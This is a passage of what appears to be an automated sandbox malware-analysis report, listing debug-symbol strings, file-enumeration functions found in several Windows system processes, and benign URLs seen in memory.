Source: |
Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp |
Source: |
Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DEED894 FindFirstFileExW, |
20_2_000002527DEED894 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
20_2_000002527DEEDA18 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DF1D894 FindFirstFileExW, |
20_2_000002527DF1D894 |
Source: C:\Windows\System32\cmd.exe |
Code function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
20_2_000002527DF1DA18 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_2_00000286D7D1D894 FindFirstFileExW, |
21_2_00000286D7D1D894 |
Source: C:\Windows\System32\conhost.exe |
Code function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
21_2_00000286D7D1DA18 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
40_2_000001D54783DA18 |
Source: C:\Windows\System32\conhost.exe |
Code function: 40_2_000001D54783D894 FindFirstFileExW, |
40_2_000001D54783D894 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0922D894 FindFirstFileExW, |
41_2_000001EF0922D894 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
41_2_000001EF0922DA18 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0942D894 FindFirstFileExW, |
41_2_000001EF0942D894 |
Source: C:\Windows\System32\dllhost.exe |
Code function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
41_2_000001EF0942DA18 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
42_2_000001CA7D1EDA18 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D1ED894 FindFirstFileExW, |
42_2_000001CA7D1ED894 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
42_2_000001CA7D21DA18 |
Source: C:\Windows\System32\winlogon.exe |
Code function: 42_2_000001CA7D21D894 FindFirstFileExW, |
42_2_000001CA7D21D894 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
43_2_0000017D2DD5DA18 |
Source: C:\Windows\System32\lsass.exe |
Code function: 43_2_0000017D2DD5D894 FindFirstFileExW, |
43_2_0000017D2DD5D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
44_2_0000022F4B92DA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B92D894 FindFirstFileExW, |
44_2_0000022F4B92D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
44_2_0000022F4B95DA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 44_2_0000022F4B95D894 FindFirstFileExW, |
44_2_0000022F4B95D894 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
45_2_00000262F1CDDA18 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1CDD894 FindFirstFileExW, |
45_2_00000262F1CDD894 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
45_2_00000262F1D0DA18 |
Source: C:\Windows\System32\dwm.exe |
Code function: 45_2_00000262F1D0D894 FindFirstFileExW, |
45_2_00000262F1D0D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
46_2_0000023942B1DA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 46_2_0000023942B1D894 FindFirstFileExW, |
46_2_0000023942B1D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF056DD894 FindFirstFileExW, |
47_2_000001EF056DD894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
47_2_000001EF056DDA18 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF0570D894 FindFirstFileExW, |
47_2_000001EF0570D894 |
Source: C:\Windows\System32\svchost.exe |
Code function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, |
47_2_000001EF0570DA18 |
Source: Microsoft-Windows-LiveId%4Operational.evtx.53.dr |
String found in binary or memory: http://Passport.NET/tb |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B |
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0 |
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0 |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0= |
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0 |
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0 |
Source: lsass.exe, 0000002B.00000002.2594057411.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079470975.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: lsass.exe, 0000002B.00000000.2079135025.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2586980188.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 |
Source: lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512 |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd |
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://go.mic |
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://go.micom/fwlink/?LinkI |
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.digicert.com0I |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.msocsp.com0 |
Source: dwm.exe, 0000002D.00000002.2645406461.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002D.00000000.2095647683.00000262ED790000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://osoft.co_2010-06X |
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust |
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/ |
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P |
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: powershell.exe, 0000001D.00000002.2617048225.0000025785F60000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6 |
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6xGh |
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
